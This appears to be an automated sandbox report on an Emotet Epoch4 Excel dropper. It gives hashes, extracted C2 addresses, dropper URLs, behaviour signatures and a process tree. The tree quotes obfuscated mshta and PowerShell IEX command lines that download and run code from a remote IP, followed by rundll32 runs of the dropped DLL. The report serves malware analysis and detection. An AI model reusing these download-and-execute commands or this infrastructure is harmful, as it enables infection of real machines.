emotet | c1588629a0158ff10768a40ec5a6492b1028b73d2cf9a85f7d74f427f71beed2

General

Target

form.xls
Size

47KB
MD5

da5f5c8ebdc10b6e77da2c377b938734
SHA1

6ea85a244cde074f36c1af938a1d9bb5bb36b9ae
SHA256

c1588629a0158ff10768a40ec5a6492b1028b73d2cf9a85f7d74f427f71beed2
SHA512

f0f451785e81c6847ccb5c4e8983baf752518b5065c3834790de233f7a1fb1dcf9083bc929679b0a2344842ed004913d1f75022326d971aca58570d314c7f149

Score

10^/10

emotet epoch4 banker suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

CMD.EXE

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2368	3140	CMD.EXE	EXCEL.EXE

suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata
Blocklisted process makes network request 4 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow pid process

37 1372 mshta.exe
38 896 powershell.exe
40 896 powershell.exe
50 3524 rundll32.exe
Downloads MZ/PE file
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

948 rundll32.exe
1916 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Pattncvcj\nfrki.chz rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
37	1372	mshta.exe
38	896	powershell.exe
40	896	powershell.exe
50	3524	rundll32.exe

pid	process
948	rundll32.exe
1916	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Pattncvcj\nfrki.chz	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3140 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exerundll32.exe

pid process

896 powershell.exe
896 powershell.exe
896 powershell.exe
3524 rundll32.exe
3524 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 896 powershell.exe

pid	process
896	powershell.exe
896	powershell.exe
896	powershell.exe
3524	rundll32.exe
3524	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	896	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE
3140	EXCEL.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

EXCEL.EXECMD.EXEpowershell.execmd.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 3140 wrote to memory of 2368	3140	EXCEL.EXE	CMD.EXE
PID 3140 wrote to memory of 2368	3140	EXCEL.EXE	CMD.EXE
PID 2368 wrote to memory of 1372	2368	CMD.EXE	mshta.exe
PID 2368 wrote to memory of 1372	2368	CMD.EXE	mshta.exe
PID 896 wrote to memory of 1012	896	powershell.exe	cmd.exe
PID 896 wrote to memory of 1012	896	powershell.exe	cmd.exe
PID 1012 wrote to memory of 948	1012	cmd.exe	rundll32.exe
PID 1012 wrote to memory of 948	1012	cmd.exe	rundll32.exe
PID 1012 wrote to memory of 948	1012	cmd.exe	rundll32.exe
PID 948 wrote to memory of 1916	948	rundll32.exe	rundll32.exe
PID 948 wrote to memory of 1916	948	rundll32.exe	rundll32.exe
PID 948 wrote to memory of 1916	948	rundll32.exe	rundll32.exe
PID 1916 wrote to memory of 2420	1916	rundll32.exe	rundll32.exe
PID 1916 wrote to memory of 2420	1916	rundll32.exe	rundll32.exe
PID 1916 wrote to memory of 2420	1916	rundll32.exe	rundll32.exe
PID 2420 wrote to memory of 3524	2420	rundll32.exe	rundll32.exe
PID 2420 wrote to memory of 3524	2420	rundll32.exe	rundll32.exe
PID 2420 wrote to memory of 3524	2420	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\form.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\SYSTEM32\CMD.EXE
CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\system32\mshta.exe
mshta http://91.240.118.168/vvv/ppp/fe.html
3⤵
- Blocklisted process makes network request
PID:1372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:896

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
5⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWow64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1916

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pattncvcj\nfrki.chz",sujrctswIYHGAk
8⤵
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pattncvcj\nfrki.chz",DllRegisterServer
9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3524

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\QWER.dll
MD5
f0bd9fc58296e16df198512822c5f5d4

SHA1
2160cb4cfad57c4b1b27eb91a8da06754c421697

SHA256
2713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3

SHA512
d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe

Download Submit
\ProgramData\QWER.dll
MD5
f0bd9fc58296e16df198512822c5f5d4

SHA1
2160cb4cfad57c4b1b27eb91a8da06754c421697

SHA256
2713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3

SHA512
d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe

Download Submit
\ProgramData\QWER.dll
MD5
f0bd9fc58296e16df198512822c5f5d4

SHA1
2160cb4cfad57c4b1b27eb91a8da06754c421697

SHA256
2713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3

SHA512
d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe

Download Submit
memory/896-313-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmp

Filesize
385.9MB

Download
memory/896-320-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmp

Filesize
385.9MB

Download
memory/896-319-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmp

Filesize
385.9MB

Download
memory/896-277-0x0000017DF32F0000-0x0000017DF3312000-memory.dmp

Filesize
136KB

Download
memory/896-296-0x0000017DF34B0000-0x0000017DF34EC000-memory.dmp

Filesize
240KB

Download
memory/896-307-0x0000017DF39C0000-0x0000017DF3A36000-memory.dmp

Filesize
472KB

Download
memory/948-323-0x0000000004671000-0x0000000004692000-memory.dmp

Filesize
132KB

Download
memory/1916-329-0x0000000004C60000-0x0000000004C85000-memory.dmp

Filesize
148KB

Download
memory/1916-339-0x0000000005130000-0x0000000005155000-memory.dmp

Filesize
148KB

Download
memory/1916-343-0x0000000005190000-0x00000000051B5000-memory.dmp

Filesize
148KB

Download
memory/1916-337-0x0000000004F60000-0x0000000004F85000-memory.dmp

Filesize
148KB

Download
memory/1916-335-0x0000000004F00000-0x0000000004F25000-memory.dmp

Filesize
148KB

Download
memory/1916-333-0x0000000004EA0000-0x0000000004EC5000-memory.dmp

Filesize
148KB

Download
memory/1916-331-0x0000000004D40000-0x0000000004D65000-memory.dmp

Filesize
148KB

Download
memory/1916-326-0x0000000004670000-0x0000000004695000-memory.dmp

Filesize
148KB

Download
memory/2420-341-0x0000000004C70000-0x0000000004C95000-memory.dmp

Filesize
148KB

Download
memory/3140-381-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-116-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-118-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-117-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-119-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-129-0x00007FF9F7A00000-0x00007FF9F7A10000-memory.dmp

Filesize
64KB

Download
memory/3140-128-0x00007FF9F7A00000-0x00007FF9F7A10000-memory.dmp

Filesize
64KB

Download
memory/3140-115-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-383-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-382-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3140-380-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp

Filesize
64KB

Download
memory/3524-344-0x0000000000CF0000-0x0000000000D15000-memory.dmp

Filesize
148KB

Download
memory/3524-355-0x0000000004BD0000-0x0000000004BF5000-memory.dmp

Filesize
148KB

Download
memory/3524-357-0x0000000004CB0000-0x0000000004CD5000-memory.dmp

Filesize
148KB

Download
memory/3524-353-0x0000000004AF0000-0x0000000004B15000-memory.dmp

Filesize
148KB

Download
memory/3524-351-0x0000000004A10000-0x0000000004A35000-memory.dmp

Filesize
148KB

Download
memory/3524-349-0x0000000004930000-0x0000000004955000-memory.dmp

Filesize
148KB

Download
memory/3524-346-0x00000000010F0000-0x0000000001115000-memory.dmp

Filesize
148KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads